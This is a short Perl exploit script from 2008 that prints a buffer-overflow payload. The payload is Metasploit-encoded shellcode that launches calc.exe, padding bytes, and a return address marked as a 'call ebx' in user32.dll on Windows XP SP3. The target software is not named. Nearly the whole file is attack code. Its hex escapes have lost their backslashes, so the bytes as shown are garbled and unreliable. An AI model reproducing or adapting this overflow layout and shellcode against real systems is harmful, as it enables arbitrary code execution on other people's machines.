#!/usr/bin/perl
# k`sOSe – 07/29/2008
use warnings;
use strict;
# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:WINDOWSsystem32calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "xd9xcaxd9x74x24xf4x5exb8xf5x65x2dxfbx31xc9xb1" .
"x24x31x46x19x83xeexfcx03x46x15x17x90xd1x13x93" .
"x5bx2axe4x90x19x16x6fxdaxa4x1ex6excdx2cx91x68" .
"x9ax6cx0ex88x77xdbxc5xbex0cxddx37x8fxd2x47x6b" .
"x74x12x03x73xb4x58xe1x7axf4xb7x0ex47xacx63xeb" .
"xcdxa9xe0xacx09x33x1dx34xd9x3fxaax32x82x23x2d" .
"xaexb6x40xa6x31x22xf1xe4x15xb0xc1x4bx67x4exa5" .
"x25xe3x25x60xf9x60x79x61x72x06x66xd4x0fx8fx9e" .
"xafxf7xd3x5fxc5x57xbcxafx90x53x63x38x3dxa5x11" .
"xb6x6axa6xc1xa4xaex04x59x62x81xf0x2ax23x4exa4" .
"xc7xb2x03x20x4dx28xd7xfaxd1xd1x76x96x8ax3bx1c" .
"x1ex28x44xd4";
print $shellcode .
"x41" x (218 – length($shellcode)) .
"x32x4cx3cx7e" ; # call ebx user32.dll winxp sp3
